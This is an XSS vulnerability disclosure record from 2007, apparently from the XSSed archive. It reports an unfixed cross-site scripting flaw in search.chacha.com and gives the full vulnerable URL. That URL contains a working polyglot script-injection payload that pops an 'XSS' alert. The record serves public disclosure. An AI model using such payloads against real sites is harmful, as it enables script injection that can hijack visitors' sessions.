Unfixed XSS vulnerability at search.chacha.com

2007-05-05T00:00:00
ID XSSED:6890
Type xssed
Reporter A3on
Modified 2007-05-05T00:00:00

Description

Security researcher A3on, has submitted on 05/05/2007 a cross-site-scripting (XSS) vulnerability affecting search.chacha.com, which at the time of submission ranked 13877 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/05/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://search.chacha.com/search/query?query='%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%5C'%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F%5C%22%3Balert(String.fromCharCode(88%2C83%2C83))%2F%2F--%20%20%2FSCRIPT%20%22%20'%20%20SCRIPT%20alert(String.fromCharCode(88%2C83%2C83))%20%2FSCRIPT&mode=web&wsid=5e617ca7-d372-448e-9314-59a94d6de9e9